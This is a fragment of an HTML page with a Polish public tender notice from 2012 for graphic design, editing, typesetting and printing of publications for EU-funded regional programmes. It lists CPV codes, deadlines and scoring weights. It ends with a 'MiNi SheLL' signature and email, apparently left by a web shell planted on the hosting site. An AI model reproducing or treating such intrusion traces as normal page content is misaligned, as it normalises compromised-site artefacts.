Przedmiot zamówienia opisany jest w załącznikach do  Specyfikacji Istotnych Warunków Zamówienia (SIWZ) tj. Opisie przedmiotu zamówienia oraz Istotnych postanowieniach umowy  - odpowiednio dla: części I.
Ww. załączniki stanowią integralną część SIWZ oraz przyszłej umowy.

Zakres świadczenia wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1, 79.80.00.00-2, 79.97.00.00-4, 79.82.20.00-2, 79.82.25.00-7, 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość druku - 10</li>
<li>3. Jakość edytorska i typograficzna - 10</li>
<li>4. Jakość wykonania oprawy - 10</li>
<li>5. Poprawnosć językowa i stylistyczna tekstów - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie graficzne, redakcja, korekta językowa, skład komputerowy, przygotowanie do druku i druk publikacji nt. komplementarności oraz publikacji nt. informacji i promocji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie graficzne, redakcja, korekta językowa, skład komputerowy, przygotowanie do druku i druk publikacji nt. komplementarności oraz publikacji nt. informacji i promocji.
Opracowanie graficzne, redakcja, korekta językowa, skład komputerowy, przygotowanie do  druku i druk publikacji nt. komplementarności,
Opracowanie graficzne, redakcja, korekta językowa, skład komputerowy, przygotowanie do druku i druk publikacji nt. informacji i promocji, 

Nr CPV: 22100000-1 Drukowanie książek, broszur i ulotek, 79800000-2 Usługi drukowania i powiązane, 79970000-4 Usługi publikacji, 79822000-2 Usługi składu, 79822500-7 Usługi projektów graficznych, 79823000-9 Usługi drukowania i dostawy ) sporządzony zgodnie z art. 29 - 30 ustawy Pzp.

Do oferty Wykonawca dołączy próbki w postaci dwóch wydanych przez siebie wydawnictw książkowych o charakterze naukowym o objętości co najmniej 100 stron formatu B5 każde, które posłużą Zamawiającemu do porównania i oceny ofert.

Przedmiot zamówienia opisany jest w załącznikach do  Specyfikacji Istotnych Warunków Zamówienia (SIWZ) tj. Opisie przedmiotu zamówienia oraz Istotnych postanowieniach umowy  - odpowiednio dla: części II.
Ww. załączniki stanowią integralną część SIWZ oraz przyszłej umowy.

Zakres świadczenia wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1, 79.80.00.00-2, 79.97.00.00-4, 79.82.20.00-2, 79.82.25.00-7, 79.82.20.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość druku - 10</li>
<li>3. Jakość edytorska i typograficzna - 10</li>
<li>4. Jakość wykonania oprawy - 10</li>
<li>5. Poprawność językowa i stylistyczna tekstów - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Druk ulotek, publikacji, plakatów, folderów w ramach: Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2007-2013, Programu Operacyjnego Kapitał Ludzki oraz Programu Operacyjnego Współpracy Transgranicznej Republika Czeska- Rzeczpospolita Polska 2007-2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Druk ulotek, publikacji, plakatów, folderów w ramach: Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2007-2013, Programu Operacyjnego Kapitał Ludzki oraz Programu Operacyjnego Współpracy Transgranicznej Republika Czeska- Rzeczpospolita Polska 2007-2013
Nr CPV: 22100000-1 Drukowanie książek, broszur i ulotek, 79800000-2 Usługi drukowania i powiązane, 79970000-4 Usługi publikacji, 79822000-2 Usługi składu, 79822500-7 Usługi projektów graficznych, 79823000-9  Usługi drukowania i dostawy ) sporządzony zgodnie z art. 29 - 30 ustawy Pzp.

3.2. Przedmiot zamówienia opisany jest w załącznikach do j Specyfikacji Istotnych Warunków Zamówienia (SIWZ) tj. Opisie przedmiotu zamówienia oraz Istotnych postanowieniach umowy  - odpowiednio dla: , części III.

Ww. załączniki stanowią integralną część SIWZ oraz przyszłej umowy.

Zakres świadczenia wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1, 79.80.00.00-2, 79.97.00.00-4, 79.82.20.00-2, 79.82.25.00-7, 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com